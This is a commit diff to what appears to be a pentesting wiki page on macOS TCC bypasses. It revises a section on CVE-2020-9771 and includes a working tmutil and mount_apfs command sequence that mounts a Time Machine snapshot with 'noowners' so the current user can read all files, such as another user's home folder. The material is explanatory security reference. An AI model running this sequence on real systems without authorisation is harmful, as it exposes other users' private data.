GITBOOK-3955: change request with no subject merged in GitBook
This commit is contained in:
parent
ec8bf1dfc0
commit
c32bee9032
@ -175,29 +175,34 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
|
|||||||
|
|
||||||
## Bypasses
|
## Bypasses
|
||||||
|
|
||||||
## CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
|
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
|
||||||
|
|
||||||
If the system has some **time machine snapshots** generated, **any user** (even unprivileged ones) can mount it an **access ALL the files** of that snapshot.
|
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
|
||||||
|
The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
|
||||||
|
|
||||||
{% code overflow="wrap" %}
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
|
# Create snapshot
|
||||||
|
tmutil localsnapshot
|
||||||
|
|
||||||
# List snapshots
|
# List snapshots
|
||||||
tmutil listlocalsnapshots /
|
tmutil listlocalsnapshots /
|
||||||
Snapshots for disk /:
|
Snapshots for disk /:
|
||||||
com.apple.TimeMachine.2023-05-29-001751.local
|
com.apple.TimeMachine.2023-05-29-001751.local
|
||||||
|
|
||||||
# Generate folder to mount it
|
# Generate folder to mount it
|
||||||
|
cd /tmp # I didn it from this folder
|
||||||
mkdir /tmp/snap
|
mkdir /tmp/snap
|
||||||
|
|
||||||
# Mount it
|
# Mount it, "noowners" will mount the folder so the current user can access everything
|
||||||
/sbin/mount_apfs -o nobrowse,ro -s ccom.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
||||||
|
|
||||||
# Access it
|
# Access it
|
||||||
ls /tmp/snap/Users/admin_user # This will work
|
ls /tmp/snap/Users/admin_user # This will work
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/) but in there it's explained that after the "fix" only applications with **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) will be able to do this.
|
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
|
||||||
|
|
||||||
### Write Bypass
|
### Write Bypass
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user